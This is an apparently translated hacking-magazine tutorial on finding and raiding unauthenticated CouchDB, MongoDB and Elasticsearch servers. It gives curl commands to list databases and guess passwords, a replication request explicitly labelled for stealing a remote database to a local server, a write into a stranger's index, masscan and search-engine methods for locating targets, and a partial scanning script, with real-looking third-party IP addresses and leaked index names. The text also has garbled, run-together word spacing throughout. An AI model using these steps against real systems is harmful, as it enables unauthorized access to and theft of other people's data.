News portals report large-scale data leaks nearly ona daily basis. Such accidents occur with all kinds ofcomputer systems all over theworld; theseverity oftheir consequences varies from devastating todisastrous. Inthis article, I will show how easy it isto gain access tovast arrays ofdata.
warning
This article isintended for educational purposes only. Neither theauthor nor theEditorial Board can beheld liable for any damages caused by improper usage ofthis information. Remember: unauthorized access toinformation ispunishable by law.
Prior todescribing theattacks, I have toexplain why inthe world such attacks are possible, andwhy admins andpeople supposed toprotect databases don’t do their job properly.
- The entrance threshold enabling people touse modern databases goes down, as well as thegeneral IT security level. Accordingly, it becomes increasingly easier for anovice ‘anykeyer’ togain admin rights toa service that requires careful andsophisticated configuring andeven basic knowledge ofa specific product. Fortunately for such ‘engineers’ – andunfortunately for owners ofthe leaked data – many network services (e.g. databases) can bedeployed “in one click”. Toinstall such services, you don’t have tounderstand their operation mechanisms andpotential threats tothem. Inthe best case scenario, thenewly-installed database isconfigured according toinstructions found using Google. Inthe worst case scenario, it may benot configured atall.
- The authentication function isoften disabled “for thepurposes ofdata management convenience”. As aresult, theport (or even DBMS interface) isvisible andaccessible toeveryone. Just come inand do whatever you want.
- The boss wants everything tobe done as cheaply as possible andrefuses topay costly fees toskilled specialists. As aresult, adesigner, oran accountant, ora janitor can beasked toinstall andconfigure adatabase for thecompany inexchange for acup ofcoffee. Needless tosay that security isout ofthe question insuch situations: it’s great ifat least apassword isset…
Overall, themain reason for data leaks are lazy admins unsafe DBMS configurations originating from thelack ofattention andknowledge.
DBMS frequently attacked by hackers
As you are likely aware, DBMS isa database management system that provides amechanism for data storage andsearch.
CouchDB
CouchDB isan open-source NoSQL database developed by theApache Software Foundation andimplemented inErlang.
The DB supports two connection methods:
- HTTP API (the default port is5984); and
- Futon web interface.
The DB isaccessed over theHTTP protocol using JSON API: this allows toaccess data from web apps running inyour browser. Thedatabase uses its own graphical interface (Futon).
But I am going touse theclassical curl
tool. Below isa standard greeting request:
curl http://127.0.0.1:5984/
The response includes theversion number, vendor name, andbase commit hash:
{
"couchdb":"Welcome","version":"2.3.1",
"git_sha":"c298091a4",
"uuid":"777dc19849f3ff0392ba09dec1a62fa7",
"features":["pluggable-storage-engines","scheduler"],
"vendor":{"name":"The Apache Software Foundation"}
}
To view thelist ofall DBs deployed onthe server, use thefollowing command:
curl http://127.0.0.1:5984/_all_dbs
The response isas follows:
[
"_replicator",
"_users",
"mychannel_",
"mychannel_kizuna-chaincode",
"mychannel_lscc",
"mychannel_user"
]
In this case, _replicator
and_users
are standard databases.
You may also get anerror message inresponse:
{
"error":"unauthorized",
"reason":"You are not a server admin."
}
If so, forget about this host – you won’t get nothing from it. Theanonymous access configuration doesn’t allow you even tosee thelist ofdatabases deployed onthe server, let alone connect tothem. However, you may try toguess thepassword. Below isthe authorization request:
curl -X PUT http://localhost:5984/test -u "login:password"
You don’t have toinstall additional software toconnect tothe graphical interface; all you have todo isgo tothe following address inyour browser:
http://127.0.0.1:5984/_utils/
To steal data, use thefollowing request:
curl -X POST -d '{"source":"http://54.161.77.240:5984/klaspadchannel_","target":"http://localhost:5984/klaspadchannel_"}' http://localhost:5984/_replicate -H "Content-Type: application/json"
Of course, you have todeploy aCouchDB server onyour local PC. But ifyou are going todeal with this DB, it’s logical toassume that you have already done this, right?
MongoDB
MongoDB isa cross-platform document-oriented database. Its main advantages are high performance andscalability. Theoperation principle ofthis DB isbased oncollections anddocuments. MongoDB supports two connection methods:
- HTTP API (the default port is27017); and
- Robo 3T client.
To get some basic information about thefound database, send asimple GET request tothe API port:
curl -X GET http://114.116.117.104:27017
The received information ispretty scarce; without adatabase driver, you can only check whether aDB isdeployed onthe server ornot.
If aMongoDB isreally running onthis port, theanswer will beas follows:
It looks like you are trying toaccess MongoDB over HTTP onthe native driver port.
This issufficient tostart amanual check using thegraphical client.
Data stolen from theattacked DB can bedumped using theGUI.
Elasticsearch
Elasticsearch isa cluster NoSQL database supporting JSON REST API andusing Lucene for full-text search. Theprogram iswritten inJava. From theattacker’s perspective, it’s astorage ofdocuments inthe JSON format.
The Elasticsearch DB can bescaled up toa petabyte ofstructured andunstructured data. Data contained inits indexes are divided into one orseveral shards. This enables Elasticsearch tobe scaled andreach sizes that not asingle PC can handle. This iswhy Elasticsearch isa distributed system; it’s difficult toguess its maximum data storage volume, but it can reach petabytes andmore.
The DB supports two connection methods:
- HTTP API (the default port is9200); and
- Kaizen graphical client available onthe official website.
The interaction with HTTP API isvery simple. First, request agreeting. For security reasons, aportion ofthe test server’s address isomitted:
curl -XGET http://47.99.Х.Х:9200/
If you have really found anElasticsearch DB, then theresponse should look something like this:
{
"name" : "node-2",
"cluster_name" : "es",
"cluster_uuid" : "q10ZJxLIQf-ZRZIC0kDkGQ",
"version" : {
"number" : "5.5.1",
"build_hash" : "19c13d0",
"build_date" : "2017-07-18T20:44:24.823Z",
"build_snapshot" : false,
"lucene_version" : "6.6.0"
},
"tagline" : "You Know, for Search"
}
To list all theDB indices, type:
curl -XGET http://47.99.Х.Х:9200/_cat/indices\?v
The response will besomething like:
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open bdp-interface x3DLdQRyTK2jssMvIJ3FmA 5 1 32576 28 428.9mb 214.4mb
green open onair-vlog Vsq0srUGSk2NvvYmXpxMBw 5 1 22 0 931.9kb 465.9kb
green open meizidb PCybF4SvTdSt1BoOCYLxNw 5 1 5328 1 27.9mb 13.9mb
green open rms-resource R6c3U5_pQgG71huRD0OdDA 5 1 125827 36 1.2gb 636.2mb
To find out what fields are stored inthe DB, use thefollowing command:
curl -XGET http://47.99.X.X:9200/meizidb
Response:
{
"meizidb":{
"aliases":{},
"mappings":{
"assets":{
"dynamic_templates":[{"string":{
"match_mapping_type":"string",
"mapping":{"type":"keyword"}
}}],
"properties":{
"annexList":{
"properties":{
"annexFileId":{"type":"keyword"},
"annexName":{"type":"keyword"},
"annexSize":{"type":"long"},
"annexThumbUrl":{"type":"keyword"},
"annexType":{"type":"keyword"},
"annexUrl":{"type":"keyword"}
}
},
"appCode":{"type":"keyword"},
"asrText":{"type":"text","index_options":"offsets","analyzer":"ik_max_word"},
"assetsType":{"type":"keyword"},
"cdetail":{
"properties":{
"SP":{"type":"keyword"},
"jz":{"type":"keyword"},
"src":{"type":"keyword"},
"tag":{"type":"keyword"},
"type":{"type":"keyword"}
}
},
"companyId":{"type":"keyword"},
"companyName": ...
}
You can even enter new records. But I strongly advise against that because committing such actions without aprior consent ofthe server owner may expose you tocriminal charges.
curl -X POST http://47.99.Х.Х:9200/onair-vlog/catalogue/1 -H 'Content-Type: application/json' -d @- << EOF
{
"username" : "KassNT",
"subject" : "My Referal url: ",
"referal" : "https://xakep.ru/paywall/form/?init&code=xakep-promo-KassNT"
}
EOF
Manual search
You can search for test hosts intwo ways:
The first way involves online services that scan theentire world andprovide information about hosts through search operators. Thefollowing engines can beused tofind suitable targets:
I am not going todescribe each search engine indetail; instead, I will provide afew practical examples. For instance, arequest for MongoDB inFofa brings thefollowing results.
Another similar service isZoomeye.org. Below are results ofa request for hosts with running CouchDB.
To demonstrate theperformance ofShodan, I am going touse aconsole utility ofthe same name. Results brought by therequest [
are shown onthe screenshot below.
The second way involves manual scanners:
- Nmap;
- Masscan;
- Zmap from theZmap.io package;
- Project Sonar; and
- Your handmade utilities.
Even though these scans are formally manual, you can make your life easier by using premade datasets. For instance, ifa VPS provider does not allow you toscan objects athigh speed, Project Sonar comes tohelp.
In theframework ofthis research project, services andprotocols are scanned with thepurpose toassess theglobal impact caused by common vulnerabilities. Its developer isRapid7, thecreator ofalmighty Metasploit Framework. Thecollected data are available togeneral public for security-related studies.
The TCP Scans section isof utmost interest: it contains results ofscans ofIP addresses conducted toidentify open ports used by various services. Take, for instance, thedataset with survey results for port 9200 (Elasticsearch).
TCP Scans
[
Lines: 3472740
[
‘1602049426’ , ‘146.148.230.26’ , ‘9200’ , ‘71.6.233.15’ , ‘9200’ , ‘54321’ , ‘248’
‘1602049426’ , ‘34.102.229.177’ , ‘9200’ , ‘71.6.233.70’ , ‘9200’ , ‘60681’ , ‘122’
‘1602049426’ , ‘104.232.64.108’ , ‘9200’ , ‘71.6.233.105’ , ‘9200’ , ‘54321’ , ‘248’
‘1602049426’ , ‘164.116.204.58’ , ‘9200’ , ‘71.6.233.79’ , ‘9200’ , ‘38329’ , ‘242’
‘1602049426’ , ‘35.186.233.76’ , ‘9200’ , ‘71.6.233.7’ , ‘9200’ , ‘44536’ , ‘122’
‘1602049426’ , ‘192.43.242.72’ , ‘9200’ , ‘71.6.233.113’ , ‘9200’ , ‘19234’ , ’56’
‘1602049426’ , ‘166.241.202.174’ , ‘9200’ , ‘71.6.233.47’ , ‘9200’ , ‘26802’ , ‘242’
‘1602049426’ , ‘142.92.75.134’ , ‘9200’ , ‘71.6.233.115’ , ‘9200’ , ‘28081’ , ‘243’
‘1602049426’ , ‘198.86.33.87’ , ‘9200’ , ‘71.6.233.112’ , ‘9200’ , ‘17403’ , ’59’
The following command isused torun Masscan:
masscan -p9200,9042,5984,27017 10.0.0.0/8 --echo > result.txt
After getting alist ofhosts, you can start their detailed examination.
Here you can see that port 9200 isopen, andthe Elasticsearch service isrunning onit.
The combined use ofsearch engines andmanual scans brings plenty ofinteresting information. Thescreenshots below show just afew examples.
To my surprise, I found lists offirst names, nicknames, andlast names (with references tospecific Telegram, VK, orViber accounts), as well as 16 databases containing 15-20 thousand strings each (see below).
Price of carelessness
Time toshow what happens with lazy admins who don’t take proper care oftheir misconfigured DBs. Inbrief, their data ‘leak’ into thelimbo, andthey get ransom demands like theone shown below.
You can use theshow
command tosee who has stolen thedata andhow.
As you can see, theattacker has logged in, deleted thedata, andleft aREADME note.
A review ofthe logs shows that the“ransom demand” was overwritten many times: every time amalicious bot finds anopen database, thedemand isreplaced with anew one.
The bot checks whether it’s possible toauthenticate andgain write access, then deletes all thedata, andleaves anote tothe grieving owner.
Of course, theattackers neither return thedata nor backup them prior tothe destruction – so, don’t trust their notes andabandon hope for their honesty.
Automation
To expedite searches for DBMS, I wrote ashort script that operates with lists inthe [
format. Thescript performs thefollowing operations:
- opens thespecified file for reading;
- splits
ip:
by theseparation character andsaves this information into avariable;port - uses
curl
toaddress thehost saved tothe variable over HTTP; - reads
http_response
received from thehost (the host response time islimited to4 seconds); - based onthe received
http_response
, thehost issaved either tothe ‘success’ file orto the‘garbage’ file.
The operations are performed incycle until thereading ofthe input file iscompleted.
echo "$LINE" | cut -d":" -f'1 2';
HTTP_CODE=$(curl --write-out "%{http_code}\n" "http://"$LINE"" --output output.txt --silent --connect-timeout 4)
if (("$HTTP_CODE"=="200")); then
echo "##########################--HTTP_API_FOUND--#########################";
echo $LINE >> result.txt
else
echo "Tried to access it, but f'ed up";
echo $LINE >> trash_bin.txt
fi
Since thedistribution ofsuch scripts can beinterpreted as creation ofmalicious programs, theabove code isnot fully operational. I strongly recommend toexercise caution should you decide towrite something like this.
As you can see, searches for potential targets andeven their subsequent ‘processing’ can beeasily automated.
Conclusions
Of course, this article covers not all vulnerable DB types, but only themost frequently ‘leaking’ ones. Themessage isclear: ifyou are anadmin, you must beaware ofthe potential attack vectors. Scan your servers ona regular basis toidentify holes before they are detected by malefactors. Close all unnecessary port by default. Hide endpoints behind authentication andgenerate strong passwords. Andof course, backup your data ona regular basis incase someone’s bot finds anddestroys them.